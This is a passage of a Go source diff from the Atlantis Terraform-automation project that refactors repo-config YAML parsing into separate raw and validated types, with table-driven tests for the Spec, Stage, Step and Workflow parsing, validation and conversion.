"github.com/runatlantis/atlantis/testing" + "gopkg.in/yaml.v2" +) + +func TestSpec_UnmarshalYAML(t *testing.T) { + cases := []struct { + description string + input string + exp raw.Spec + expErr string + }{ + { + description: "no data", + input: "", + exp: raw.Spec{ + Version: nil, + Projects: nil, + Workflows: nil, + }, + }, + { + description: "yaml nil", + input: "~", + exp: raw.Spec{ + Version: nil, + Projects: nil, + Workflows: nil, + }, + }, + { + description: "invalid key", + input: "invalid: key", + exp: raw.Spec{ + Version: nil, + Projects: nil, + Workflows: nil, + }, + expErr: "yaml: unmarshal errors:\n line 1: field invalid not found in struct raw.Spec", + }, + { + description: "version set", + input: "version: 2", + exp: raw.Spec{ + Version: Int(2), + Projects: nil, + Workflows: nil, + }, + }, + { + description: "projects key without value", + input: "projects:", + exp: raw.Spec{ + Version: nil, + Projects: nil, + Workflows: nil, + }, + }, + { + description: "workflows key without value", + input: "workflows:", + exp: raw.Spec{ + Version: nil, + Projects: nil, + Workflows: nil, + }, + }, + { + description: "projects with a map", + input: "projects:\n key: value", + exp: raw.Spec{ + Version: nil, + Projects: nil, + Workflows: nil, + }, + expErr: "yaml: unmarshal errors:\n line 2: cannot unmarshal !!map into []raw.Project", + }, + { + description: "projects with a scalar", + input: "projects: value", + exp: raw.Spec{ + Version: nil, + Projects: nil, + Workflows: nil, + }, + expErr: "yaml: unmarshal errors:\n line 1: cannot unmarshal !!str `value` into []raw.Project", + }, + { + description: "should use values if set", + input: ` +version: 2 +projects: +- dir: mydir + workspace: myworkspace + workflow: default + terraform_version: v0.11.0 + autoplan: + enabled: false + when_modified: [] + apply_requirements: [mergeable] +workflows: + default: + plan: + steps: [] + apply: + steps: []`, + exp: raw.Spec{ + Version: Int(2), + Projects: []raw.Project{ + { + Dir: 
String("mydir"), + Workspace: String("myworkspace"), + Workflow: String("default"), + TerraformVersion: String("v0.11.0"), + Autoplan: &raw.Autoplan{ + WhenModified: []string{}, + Enabled: Bool(false), + }, + ApplyRequirements: []string{"mergeable"}, + }, + }, + Workflows: map[string]raw.Workflow{ + "default": { + Apply: &raw.Stage{ + Steps: []raw.Step{}, + }, + Plan: &raw.Stage{ + Steps: []raw.Step{}, + }, + }, + }, + }, + }, + } + for _, c := range cases { + t.Run(c.description, func(t *testing.T) { + var conf raw.Spec + err := yaml.UnmarshalStrict([]byte(c.input), &conf) + if c.expErr != "" { + ErrEquals(t, c.expErr, err) + return + } + Ok(t, err) + Equals(t, c.exp, conf) + }) + } +} + +func TestSpec_Validate(t *testing.T) { + cases := []struct { + description string + input raw.Spec + expErr string + }{} + validation.ErrorTag = "yaml" + for _, c := range cases { + t.Run(c.description, func(t *testing.T) { + err := c.input.Validate() + if c.expErr == "" { + Ok(t, err) + } else { + ErrEquals(t, c.expErr, err) + } + }) + } +} + +func TestSpec_ToValid(t *testing.T) { + cases := []struct { + description string + input raw.Spec + exp valid.Spec + }{ + { + description: "nothing set", + input: raw.Spec{Version: Int(2)}, + exp: valid.Spec{ + Version: 2, + Workflows: make(map[string]valid.Workflow), + }, + }, + { + description: "set to empty", + input: raw.Spec{ + Version: Int(2), + Workflows: map[string]raw.Workflow{}, + Projects: []raw.Project{}, + }, + exp: valid.Spec{ + Version: 2, + Workflows: map[string]valid.Workflow{}, + Projects: nil, + }, + }, + { + description: "everything set", + input: raw.Spec{ + Version: Int(2), + Workflows: map[string]raw.Workflow{ + "myworkflow": { + Apply: &raw.Stage{ + Steps: []raw.Step{ + { + Key: String("apply"), + }, + }, + }, + Plan: &raw.Stage{ + Steps: []raw.Step{ + { + Key: String("init"), + }, + }, + }, + }, + }, + Projects: []raw.Project{ + { + Dir: String("mydir"), + }, + }, + }, + exp: valid.Spec{ + Version: 2, + Workflows: 
map[string]valid.Workflow{ + "myworkflow": { + Apply: &valid.Stage{ + Steps: []valid.Step{ + { + StepName: "apply", + }, + }, + }, + Plan: &valid.Stage{ + Steps: []valid.Step{ + { + StepName: "init", + }, + }, + }, + }, + }, + Projects: []valid.Project{ + { + Dir: "mydir", + Workspace: "default", + Autoplan: valid.Autoplan{ + WhenModified: []string{"**/*.tf"}, + Enabled: true, + }, + }, + }, + }, + }, + } + for _, c := range cases { + t.Run(c.description, func(t *testing.T) { + Equals(t, c.exp, c.input.ToValid()) + }) + } +} diff --git a/server/events/yaml/raw/stage.go b/server/events/yaml/raw/stage.go new file mode 100644 index 0000000000..67eef1d3be --- /dev/null +++ b/server/events/yaml/raw/stage.go @@ -0,0 +1,26 @@ +package raw + +import ( + "github.com/go-ozzo/ozzo-validation" + "github.com/runatlantis/atlantis/server/events/yaml/valid" +) + +type Stage struct { + Steps []Step `yaml:"steps,omitempty"` +} + +func (s Stage) Validate() error { + return validation.ValidateStruct(&s, + validation.Field(&s.Steps), + ) +} + +func (s Stage) ToValid() valid.Stage { + var validSteps []valid.Step + for _, s := range s.Steps { + validSteps = append(validSteps, s.ToValid()) + } + return valid.Stage{ + Steps: validSteps, + } +} diff --git a/server/events/yaml/raw/stage_test.go b/server/events/yaml/raw/stage_test.go new file mode 100644 index 0000000000..245ed2c4f3 --- /dev/null +++ b/server/events/yaml/raw/stage_test.go @@ -0,0 +1,103 @@ +package raw_test + +import ( + "testing" + + "github.com/go-ozzo/ozzo-validation" + "github.com/runatlantis/atlantis/server/events/yaml/raw" + "github.com/runatlantis/atlantis/server/events/yaml/valid" + . 
"github.com/runatlantis/atlantis/testing" + "gopkg.in/yaml.v2" +) + +func TestStage_UnmarshalYAML(t *testing.T) { + cases := []struct { + description string + input string + exp raw.Stage + }{ + { + description: "empty", + input: "", + exp: raw.Stage{ + Steps: nil, + }, + }, + { + description: "all fields set", + input: ` +steps: [step1] +`, + exp: raw.Stage{ + Steps: []raw.Step{ + { + Key: String("step1"), + }, + }, + }, + }, + } + + for _, c := range cases { + t.Run(c.description, func(t *testing.T) { + var a raw.Stage + err := yaml.UnmarshalStrict([]byte(c.input), &a) + Ok(t, err) + Equals(t, c.exp, a) + }) + } +} + +func TestStage_Validate(t *testing.T) { + // Should validate each step. + s := raw.Stage{ + Steps: []raw.Step{ + { + Key: String("invalid"), + }, + }, + } + validation.ErrorTag = "yaml" + ErrEquals(t, "steps: (0: \"invalid\" is not a valid step type.).", s.Validate()) + + // Empty steps should validate. + Ok(t, (raw.Stage{}).Validate()) +} + +func TestStage_ToValid(t *testing.T) { + cases := []struct { + description string + input raw.Stage + exp valid.Stage + }{ + { + description: "nothing set", + input: raw.Stage{}, + exp: valid.Stage{ + Steps: nil, + }, + }, + { + description: "fields set", + input: raw.Stage{ + Steps: []raw.Step{ + { + Key: String("init"), + }, + }, + }, + exp: valid.Stage{ + Steps: []valid.Step{ + { + StepName: "init", + }, + }, + }, + }, + } + for _, c := range cases { + t.Run(c.description, func(t *testing.T) { + Equals(t, c.exp, c.input.ToValid()) + }) + } +} diff --git a/server/events/yaml/raw/step.go b/server/events/yaml/raw/step.go new file mode 100644 index 0000000000..b414f4607f --- /dev/null +++ b/server/events/yaml/raw/step.go @@ -0,0 +1,195 @@ +package raw + +import ( + "errors" + "fmt" + "strings" + + "github.com/flynn-archive/go-shlex" + "github.com/go-ozzo/ozzo-validation" + "github.com/runatlantis/atlantis/server/events/yaml/valid" +) + +const ( + ExtraArgsKey = "extra_args" + RunStepName = "run" + PlanStepName = 
"plan" + ApplyStepName = "apply" + InitStepName = "init" +) + +// Step represents a single action/command to perform. In YAML, it can be set as +// 1. A single string for a built-in command: +// - init +// - plan +// 2. A map for a built-in command and extra_args: +// - plan: +// extra_args: [-var-file=staging.tfvars] +// 3. A map for a custom run command: +// - run: my custom command +// Here we parse step in the most generic fashion possible. See fields for more +// details. +type Step struct { + // Key will be set in case #1 and #3 above to the key. In case #2, there + // could be multiple keys (since the element is a map) so we don't set Key. + Key *string + // Map will be set in case #2 above. + Map map[string]map[string][]string + // StringVal will be set in case #3 above. + StringVal map[string]string +} + +func (s *Step) UnmarshalYAML(unmarshal func(interface{}) error) error { + // First try to unmarshal as a single string, ex. + // steps: + // - init + // - plan + // We validate if it's a legal string later. + var singleString string + err := unmarshal(&singleString) + if err == nil { + s.Key = &singleString + return nil + } + + // This represents a step with extra_args, ex: + // init: + // extra_args: [a, b] + // We validate if there's a single key in the map and if the value is a + // legal value later. + var step map[string]map[string][]string + err = unmarshal(&step) + if err == nil { + s.Map = step + return nil + } + + // Try to unmarshal as a custom run step, ex. + // steps: + // - run: my command + // We validate if the key is run later. 
+ var runStep map[string]string + err = unmarshal(&runStep) + if err == nil { + s.StringVal = runStep + return nil + } + + return err +} + +func (s Step) Validate() error { + validStep := func(value interface{}) error { + str := *value.(*string) + if str != InitStepName && str != PlanStepName && str != ApplyStepName { + return fmt.Errorf("%q is not a valid step type", str) + } + return nil + } + + extraArgs := func(value interface{}) error { + elem := value.(map[string]map[string][]string) + var keys []string + for k := range elem { + keys = append(keys, k) + } + + if len(keys) > 1 { + return fmt.Errorf("step element can only contain a single key, found %d: %s", + len(keys), strings.Join(keys, ",")) + } + for stepName, args := range elem { + if stepName != InitStepName && stepName != PlanStepName && stepName != ApplyStepName { + return fmt.Errorf("%q is not a valid step type", stepName) + } + var argKeys []string + for k := range args { + argKeys = append(argKeys, k) + } + + // args should contain a single 'extra_args' key. 
+ if len(argKeys) > 1 { + return fmt.Errorf("built-in steps only support a single %s key, found %d: %s", + ExtraArgsKey, len(argKeys), strings.Join(argKeys, ",")) + } + for k := range args { + if k != ExtraArgsKey { + return fmt.Errorf("built-in steps only support a single %s key, found %q in step %s", ExtraArgsKey, k, stepName) + } + } + } + return nil + } + + runStep := func(value interface{}) error { + elem := value.(map[string]string) + var keys []string + for k := range elem { + keys = append(keys, k) + } + + if len(keys) > 1 { + return fmt.Errorf("step element can only contain a single key, found %d: %s", + len(keys), strings.Join(keys, ",")) + } + for stepName, args := range elem { + if stepName != RunStepName { + return fmt.Errorf("%q is not a valid step type", stepName) + } + _, err := shlex.Split(args) + if err != nil { + return fmt.Errorf("unable to parse as shell command: %s", err) + } + } + return nil + } + + if s.Key != nil { + return validation.Validate(s.Key, validation.By(validStep)) + } + if len(s.Map) > 0 { + return validation.Validate(s.Map, validation.By(extraArgs)) + } + if len(s.StringVal) > 0 { + return validation.Validate(s.StringVal, validation.By(runStep)) + } + return errors.New("step element is empty") +} + +func (s Step) ToValid() valid.Step { + // This will trigger in case #1 (see Step docs). + if s.Key != nil { + return valid.Step{ + StepName: *s.Key, + } + } + + // This will trigger in case #2 (see Step docs). + if len(s.Map) > 0 { + // After validation we assume there's only one key and it's a valid + // step name so we just use the first one. + for stepName, stepArgs := range s.Map { + return valid.Step{ + StepName: stepName, + ExtraArgs: stepArgs[ExtraArgsKey], + } + } + } + + // This will trigger in case #3 (see Step docs). + if len(s.StringVal) > 0 { + // After validation we assume there's only one key and it's a valid + // step name so we just use the first one. 
+ for _, v := range s.StringVal { + // We ignore the error here because it should have been checked in + // Validate(). + split, _ := shlex.Split(v) // nolint: errcheck + return valid.Step{ + StepName: RunStepName, + RunCommand: split, + } + } + } + + panic("step was not valid. This is a bug!") +} diff --git a/server/events/yaml/raw/step_test.go b/server/events/yaml/raw/step_test.go new file mode 100644 index 0000000000..ec8a5d4934 --- /dev/null +++ b/server/events/yaml/raw/step_test.go @@ -0,0 +1,387 @@ +package raw_test + +import ( + "testing" + + "github.com/runatlantis/atlantis/server/events/yaml/raw" + "github.com/runatlantis/atlantis/server/events/yaml/valid" + . "github.com/runatlantis/atlantis/testing" + "gopkg.in/yaml.v2" +) + +func TestStepConfig_UnmarshalYAML(t *testing.T) { + cases := []struct { + description string + input string + exp raw.Step + expErr string + }{ + + // Single string. + { + description: "single string", + input: `astring`, + exp: raw.Step{ + Key: String("astring"), + }, + }, + + // MapType i.e. extra_args style. 
+ { + description: "extra_args style", + input: ` +key: + mapValue: [arg1, arg2]`, + exp: raw.Step{ + Map: MapType{ + "key": { + "mapValue": {"arg1", "arg2"}, + }, + }, + }, + }, + { + description: "extra_args style multiple keys", + input: ` +key: + mapValue: [arg1, arg2] + value2: []`, + exp: raw.Step{ + Map: MapType{ + "key": { + "mapValue": {"arg1", "arg2"}, + "value2": {}, + }, + }, + }, + }, + { + description: "extra_args style multiple top-level keys", + input: ` +key: + val1: [] +key2: + val2: []`, + exp: raw.Step{ + Map: MapType{ + "key": { + "val1": {}, + }, + "key2": { + "val2": {}, + }, + }, + }, + }, + + // Run-step style + { + description: "run step", + input: ` +run: my command`, + exp: raw.Step{ + StringVal: map[string]string{ + "run": "my command", + }, + }, + }, + { + description: "run step multiple top-level keys", + input: ` +run: my command +key: value`, + exp: raw.Step{ + StringVal: map[string]string{ + "run": "my command", + "key": "value", + }, + }, + }, + + // Empty + { + description: "empty", + input: "", + exp: raw.Step{ + Key: nil, + Map: nil, + StringVal: nil, + }, + }, + + // Errors + { + description: "extra args style no slice strings", + input: ` +key: + value: + another: map`, + expErr: "yaml: unmarshal errors:\n line 3: cannot unmarshal !!map into string", + }, + } + + for _, c := range cases { + t.Run(c.description, func(t *testing.T) { + var got raw.Step + err := yaml.UnmarshalStrict([]byte(c.input), &got) + if c.expErr != "" { + ErrEquals(t, c.expErr, err) + return + } + Ok(t, err) + Equals(t, c.exp, got) + }) + } +} + +func TestStep_Validate(t *testing.T) { + cases := []struct { + description string + input raw.Step + expErr string + }{ + // Valid inputs. 
+ { + description: "init step", + input: raw.Step{ + Key: String("init"), + }, + expErr: "", + }, + { + description: "plan step", + input: raw.Step{ + Key: String("plan"), + }, + expErr: "", + }, + { + description: "apply step", + input: raw.Step{ + Key: String("apply"), + }, + expErr: "", + }, + { + description: "init extra_args", + input: raw.Step{ + Map: MapType{ + "init": { + "extra_args": []string{"arg1", "arg2"}, + }, + }, + }, + expErr: "", + }, + { + description: "plan extra_args", + input: raw.Step{ + Map: MapType{ + "plan": { + "extra_args": []string{"arg1", "arg2"}, + }, + }, + }, + expErr: "", + }, + { + description: "apply extra_args", + input: raw.Step{ + Map: MapType{ + "apply": { + "extra_args": []string{"arg1", "arg2"}, + }, + }, + }, + expErr: "", + }, + { + description: "run step", + input: raw.Step{ + StringVal: map[string]string{ + "run": "my command", + }, + }, + expErr: "", + }, + + // Invalid inputs. + { + description: "empty elem", + input: raw.Step{}, + expErr: "step element is empty", + }, + { + description: "invalid step name", + input: raw.Step{ + Key: String("invalid"), + }, + expErr: "\"invalid\" is not a valid step type", + }, + { + description: "multiple keys in map", + input: raw.Step{ + Map: MapType{ + "key1": nil, + "key2": nil, + }, + }, + expErr: "step element can only contain a single key, found 2: key1,key2", + }, + { + description: "multiple keys in string val", + input: raw.Step{ + StringVal: map[string]string{ + "key1": "", + "key2": "", + }, + }, + expErr: "step element can only contain a single key, found 2: key1,key2", + }, + { + description: "invalid key in map", + input: raw.Step{ + Map: MapType{ + "invalid": nil, + }, + }, + expErr: "\"invalid\" is not a valid step type", + }, + { + description: "invalid key in string val", + input: raw.Step{ + StringVal: map[string]string{ + "invalid": "", + }, + }, + expErr: "\"invalid\" is not a valid step type", + }, + { + description: "non extra_arg key", + input: raw.Step{ + 
Map: MapType{ + "init": { + "invalid": nil, + }, + }, + }, + expErr: "built-in steps only support a single extra_args key, found \"invalid\" in step init", + }, + { + description: "unparseable shell command", + input: raw.Step{ + StringVal: map[string]string{ + "run": "my 'c", + }, + }, + expErr: "unable to parse as shell command: EOF found when expecting closing quote.", + }, + } + for _, c := range cases { + t.Run(c.description, func(t *testing.T) { + err := c.input.Validate() + if c.expErr == "" { + Ok(t, err) + return + } + ErrEquals(t, c.expErr, err) + }) + } +} + +func TestStep_ToValid(t *testing.T) { + cases := []struct { + description string + input raw.Step + exp valid.Step + }{ + { + description: "init step", + input: raw.Step{ + Key: String("init"), + }, + exp: valid.Step{ + StepName: "init", + }, + }, + { + description: "plan step", + input: raw.Step{ + Key: String("plan"), + }, + exp: valid.Step{ + StepName: "plan", + }, + }, + { + description: "apply step", + input: raw.Step{ + Key: String("apply"), + }, + exp: valid.Step{ + StepName: "apply", + }, + }, + { + description: "init extra_args", + input: raw.Step{ + Map: MapType{ + "init": { + "extra_args": []string{"arg1", "arg2"}, + }, + }, + }, + exp: valid.Step{ + StepName: "init", + ExtraArgs: []string{"arg1", "arg2"}, + }, + }, + { + description: "plan extra_args", + input: raw.Step{ + Map: MapType{ + "plan": { + "extra_args": []string{"arg1", "arg2"}, + }, + }, + }, + exp: valid.Step{ + StepName: "plan", + ExtraArgs: []string{"arg1", "arg2"}, + }, + }, + { + description: "apply extra_args", + input: raw.Step{ + Map: MapType{ + "apply": { + "extra_args": []string{"arg1", "arg2"}, + }, + }, + }, + exp: valid.Step{ + StepName: "apply", + ExtraArgs: []string{"arg1", "arg2"}, + }, + }, + { + description: "run step", + input: raw.Step{ + StringVal: map[string]string{ + "run": "my 'run command'", + }, + }, + exp: valid.Step{ + StepName: "run", + RunCommand: []string{"my", "run command"}, + }, + }, + } + 
for _, c := range cases { + t.Run(c.description, func(t *testing.T) { + Equals(t, c.exp, c.input.ToValid()) + }) + } +} + +type MapType map[string]map[string][]string diff --git a/server/events/yaml/raw/workflow.go b/server/events/yaml/raw/workflow.go new file mode 100644 index 0000000000..1a6dc73245 --- /dev/null +++ b/server/events/yaml/raw/workflow.go @@ -0,0 +1,31 @@ +package raw + +import ( + "github.com/go-ozzo/ozzo-validation" + "github.com/runatlantis/atlantis/server/events/yaml/valid" +) + +type Workflow struct { + Apply *Stage `yaml:"apply,omitempty"` + Plan *Stage `yaml:"plan,omitempty"` +} + +func (w Workflow) Validate() error { + return validation.ValidateStruct(&w, + validation.Field(&w.Apply), + validation.Field(&w.Plan), + ) +} + +func (w Workflow) ToValid() valid.Workflow { + var v valid.Workflow + if w.Apply != nil { + apply := w.Apply.ToValid() + v.Apply = &apply + } + if w.Plan != nil { + plan := w.Plan.ToValid() + v.Plan = &plan + } + return v +} diff --git a/server/events/yaml/raw/workflow_test.go b/server/events/yaml/raw/workflow_test.go new file mode 100644 index 0000000000..85320cfaad --- /dev/null +++ b/server/events/yaml/raw/workflow_test.go @@ -0,0 +1,168 @@ +package raw_test + +import ( + "testing" + + "github.com/go-ozzo/ozzo-validation" + "github.com/runatlantis/atlantis/server/events/yaml/raw" + "github.com/runatlantis/atlantis/server/events/yaml/valid" + . 
"github.com/runatlantis/atlantis/testing" + "gopkg.in/yaml.v2" +) + +func TestWorkflow_UnmarshalYAML(t *testing.T) { + cases := []struct { + description string + input string + exp raw.Workflow + expErr string + }{ + { + description: "empty", + input: ``, + exp: raw.Workflow{ + Apply: nil, + Plan: nil, + }, + }, + { + description: "yaml null", + input: `~`, + exp: raw.Workflow{ + Apply: nil, + Plan: nil, + }, + }, + { + description: "only plan/apply set", + input: ` +plan: +apply: +`, + exp: raw.Workflow{ + Apply: nil, + Plan: nil, + }, + }, + { + description: "steps set to null", + input: ` +plan: + steps: ~ +apply: + steps: ~`, + exp: raw.Workflow{ + Plan: &raw.Stage{ + Steps: nil, + }, + Apply: &raw.Stage{ + Steps: nil, + }, + }, + }, + { + description: "steps set to empty slice", + input: ` +plan: + steps: [] +apply: + steps: []`, + exp: raw.Workflow{ + Plan: &raw.Stage{ + Steps: []raw.Step{}, + }, + Apply: &raw.Stage{ + Steps: []raw.Step{}, + }, + }, + }, + } + + for _, c := range cases { + t.Run(c.description, func(t *testing.T) { + var w raw.Workflow + err := yaml.UnmarshalStrict([]byte(c.input), &w) + if c.expErr != "" { + ErrEquals(t, c.expErr, err) + return + } + Ok(t, err) + Equals(t, c.exp, w) + }) + } +} + +func TestWorkflow_Validate(t *testing.T) { + // Should call the validate of Stage. + w := raw.Workflow{ + Apply: &raw.Stage{ + Steps: []raw.Step{ + { + Key: String("invalid"), + }, + }, + }, + } + validation.ErrorTag = "yaml" + ErrEquals(t, "apply: (steps: (0: \"invalid\" is not a valid step type.).).", w.Validate()) + + // Unset keys should validate. 
+ Ok(t, (raw.Workflow{}).Validate()) +} + +func TestWorkflow_ToValid(t *testing.T) { + cases := []struct { + description string + input raw.Workflow + exp valid.Workflow + }{ + { + description: "nothing set", + input: raw.Workflow{}, + exp: valid.Workflow{ + Apply: nil, + Plan: nil, + }, + }, + { + description: "fields set", + input: raw.Workflow{ + Apply: &raw.Stage{ + Steps: []raw.Step{ + { + Key: String("init"), + }, + }, + }, + Plan: &raw.Stage{ + Steps: []raw.Step{ + { + Key: String("init"), + }, + }, + }, + }, + exp: valid.Workflow{ + Apply: &valid.Stage{ + Steps: []valid.Step{ + { + StepName: "init", + }, + }, + }, + Plan: &valid.Stage{ + Steps: []valid.Step{ + { + StepName: "init", + }, + }, + }, + }, + }, + } + for _, c := range cases { + t.Run(c.description, func(t *testing.T) { + Equals(t, c.exp, c.input.ToValid()) + }) + } +} diff --git a/server/events/yaml/spec.go b/server/events/yaml/spec.go deleted file mode 100644 index 874877f766..0000000000 --- a/server/events/yaml/spec.go +++ /dev/null @@ -1,7 +0,0 @@ -package yaml - -type Spec struct { - Version *int `yaml:"version,omitempty"` - Projects []Project `yaml:"projects,omitempty"` - Workflows map[string]Workflow `yaml:"workflows,omitempty"` -} diff --git a/server/events/yaml/spec_test.go b/server/events/yaml/spec_test.go deleted file mode 100644 index 6106e22a27..0000000000 --- a/server/events/yaml/spec_test.go +++ /dev/null @@ -1,152 +0,0 @@ -package yaml_test - -import ( - "testing" - - "github.com/runatlantis/atlantis/server/events/yaml" - . 
"github.com/runatlantis/atlantis/testing" - yamlv2 "gopkg.in/yaml.v2" -) - -func TestConfig_UnmarshalYAML(t *testing.T) { - cases := []struct { - description string - input string - exp yaml.Spec - expErr string - }{ - { - description: "no data", - input: "", - exp: yaml.Spec{ - Version: nil, - Projects: nil, - Workflows: nil, - }, - }, - { - description: "yaml nil", - input: "~", - exp: yaml.Spec{ - Version: nil, - Projects: nil, - Workflows: nil, - }, - }, - { - description: "invalid key", - input: "invalid: key", - exp: yaml.Spec{ - Version: nil, - Projects: nil, - Workflows: nil, - }, - expErr: "yaml: unmarshal errors:\n line 1: field invalid not found in struct yaml.Spec", - }, - { - description: "version set", - input: "version: 2", - exp: yaml.Spec{ - Version: Int(2), - Projects: nil, - Workflows: nil, - }, - }, - { - description: "projects key without value", - input: "projects:", - exp: yaml.Spec{ - Version: nil, - Projects: nil, - Workflows: nil, - }, - }, - { - description: "workflows key without value", - input: "workflows:", - exp: yaml.Spec{ - Version: nil, - Projects: nil, - Workflows: nil, - }, - }, - { - description: "projects with a map", - input: "projects:\n key: value", - exp: yaml.Spec{ - Version: nil, - Projects: nil, - Workflows: nil, - }, - expErr: "yaml: unmarshal errors:\n line 2: cannot unmarshal !!map into []yaml.Project", - }, - { - description: "projects with a scalar", - input: "projects: value", - exp: yaml.Spec{ - Version: nil, - Projects: nil, - Workflows: nil, - }, - expErr: "yaml: unmarshal errors:\n line 1: cannot unmarshal !!str `value` into []yaml.Project", - }, - { - description: "should use values if set", - input: ` -version: 2 -projects: -- dir: mydir - workspace: myworkspace - workflow: default - terraform_version: v0.11.0 - auto_plan: - enabled: false - when_modified: [] - apply_requirements: [mergeable] -workflows: - default: - plan: - steps: [] - apply: - steps: []`, - exp: yaml.Spec{ - Version: Int(2), - Projects: 
[]yaml.Project{ - { - Dir: String("mydir"), - Workspace: String("myworkspace"), - Workflow: String("default"), - TerraformVersion: String("v0.11.0"), - AutoPlan: &yaml.AutoPlan{ - WhenModified: []string{}, - Enabled: Bool(false), - }, - ApplyRequirements: []string{"mergeable"}, - }, - }, - Workflows: map[string]yaml.Workflow{ - "default": { - Apply: &yaml.Stage{ - Steps: []yaml.Step{}, - }, - Plan: &yaml.Stage{ - Steps: []yaml.Step{}, - }, - }, - }, - }, - }, - } - for _, c := range cases { - t.Run(c.description, func(t *testing.T) { - var conf yaml.Spec - err := yamlv2.UnmarshalStrict([]byte(c.input), &conf) - if c.expErr != "" { - ErrEquals(t, c.expErr, err) - return - } - Ok(t, err) - Equals(t, c.exp, conf) - }) - } -} diff --git a/server/events/yaml/stage.go b/server/events/yaml/stage.go deleted file mode 100644 index be342403f6..0000000000 --- a/server/events/yaml/stage.go +++ /dev/null @@ -1,5 +0,0 @@ -package yaml - -type Stage struct { - Steps []Step `yaml:"steps,omitempty"` -} diff --git a/server/events/yaml/stage_test.go b/server/events/yaml/stage_test.go deleted file mode 100644 index ffcebe1a5a..0000000000 --- a/server/events/yaml/stage_test.go +++ /dev/null @@ -1,47 +0,0 @@ -package yaml_test - -import ( - "testing" - - "github.com/runatlantis/atlantis/server/events/yaml" - . 
"github.com/runatlantis/atlantis/testing" - yamlv2 "gopkg.in/yaml.v2" -) - -func TestStage_UnmarshalYAML(t *testing.T) { - cases := []struct { - description string - input string - exp yaml.Stage - }{ - { - description: "empty", - input: "", - exp: yaml.Stage{ - Steps: nil, - }, - }, - { - description: "all fields set", - input: ` -steps: [step1] -`, - exp: yaml.Stage{ - Steps: []yaml.Step{ - { - Key: String("step1"), - }, - }, - }, - }, - } - - for _, c := range cases { - t.Run(c.description, func(t *testing.T) { - var a yaml.Stage - err := yamlv2.UnmarshalStrict([]byte(c.input), &a) - Ok(t, err) - Equals(t, c.exp, a) - }) - } -} diff --git a/server/events/yaml/step.go b/server/events/yaml/step.go deleted file mode 100644 index f8c09d9bc0..0000000000 --- a/server/events/yaml/step.go +++ /dev/null @@ -1,61 +0,0 @@ -package yaml - -// Step represents a single action/command to perform. In YAML, it can be set as -// 1. A single string for a built-in command: -// - init -// - plan -// 2. A map for a built-in command and extra_args: -// - plan: -// extra_args: [-var-file=staging.tfvars] -// 3. A map for a custom run command: -// - run: my custom command -// Here we parse step in the most generic fashion possible. See fields for more -// details. -type Step struct { - // Key will be set in case #1 and #3 above to the key. In case #2, there - // could be multiple keys (since the element is a map) so we don't set Key. - Key *string - // Map will be set in case #2 above. - Map map[string]map[string][]string - // StringVal will be set in case #3 above. - StringVal map[string]string -} - -func (s *Step) UnmarshalYAML(unmarshal func(interface{}) error) error { - // First try to unmarshal as a single string, ex. - // steps: - // - init - // - plan - // We validate if it's a legal string later. 
- var singleString string - err := unmarshal(&singleString) - if err == nil { - s.Key = &singleString - return nil - } - - // This represents a step with extra_args, ex: - // init: - // extra_args: [a, b] - // We validate if there's a single key in the map and if the value is a - // legal value later. - var step map[string]map[string][]string - err = unmarshal(&step) - if err == nil { - s.Map = step - return nil - } - - // Try to unmarshal as a custom run step, ex. - // steps: - // - run: my command - // We validate if the key is run later. - var runStep map[string]string - err = unmarshal(&runStep) - if err == nil { - s.StringVal = runStep - return nil - } - - return err -} diff --git a/server/events/yaml/step_test.go b/server/events/yaml/step_test.go deleted file mode 100644 index 4bdb6f33ec..0000000000 --- a/server/events/yaml/step_test.go +++ /dev/null @@ -1,134 +0,0 @@ -package yaml_test - -import ( - "testing" - - "github.com/runatlantis/atlantis/server/events/yaml" - . "github.com/runatlantis/atlantis/testing" - yamlv2 "gopkg.in/yaml.v2" -) - -func TestStepConfig_UnmarshalYAML(t *testing.T) { - cases := []struct { - description string - input string - exp yaml.Step - expErr string - }{ - - // Single string. - { - description: "single string", - input: `astring`, - exp: yaml.Step{ - Key: String("astring"), - }, - }, - - // map[string]map[string][]string i.e. extra_args style. 
- { - description: "extra_args style", - input: ` -key: - mapValue: [arg1, arg2]`, - exp: yaml.Step{ - Map: map[string]map[string][]string{ - "key": { - "mapValue": {"arg1", "arg2"}, - }, - }, - }, - }, - { - description: "extra_args style multiple keys", - input: ` -key: - mapValue: [arg1, arg2] - value2: []`, - exp: yaml.Step{ - Map: map[string]map[string][]string{ - "key": { - "mapValue": {"arg1", "arg2"}, - "value2": {}, - }, - }, - }, - }, - { - description: "extra_args style multiple top-level keys", - input: ` -key: - val1: [] -key2: - val2: []`, - exp: yaml.Step{ - Map: map[string]map[string][]string{ - "key": { - "val1": {}, - }, - "key2": { - "val2": {}, - }, - }, - }, - }, - - // Run-step style - { - description: "run step", - input: ` -run: my command`, - exp: yaml.Step{ - StringVal: map[string]string{ - "run": "my command", - }, - }, - }, - { - description: "run step multiple top-level keys", - input: ` -run: my command -key: value`, - exp: yaml.Step{ - StringVal: map[string]string{ - "run": "my command", - "key": "value", - }, - }, - }, - - // Empty - { - description: "empty", - input: "", - exp: yaml.Step{ - Key: nil, - Map: nil, - StringVal: nil, - }, - }, - - // Errors - { - description: "extra args style no slice strings", - input: ` -key: - value: - another: map`, - expErr: "yaml: unmarshal errors:\n line 3: cannot unmarshal !!map into string", - }, - } - - for _, c := range cases { - t.Run(c.description, func(t *testing.T) { - var got yaml.Step - err := yamlv2.UnmarshalStrict([]byte(c.input), &got) - if c.expErr != "" { - ErrEquals(t, c.expErr, err) - return - } - Ok(t, err) - Equals(t, c.exp, got) - }) - } -} diff --git a/server/events/yaml/valid/valid.go b/server/events/yaml/valid/valid.go new file mode 100644 index 0000000000..75d79a3d93 --- /dev/null +++ b/server/events/yaml/valid/valid.go @@ -0,0 +1,41 @@ +package valid + +// Spec is the atlantis yaml spec after it's been parsed and validated. 
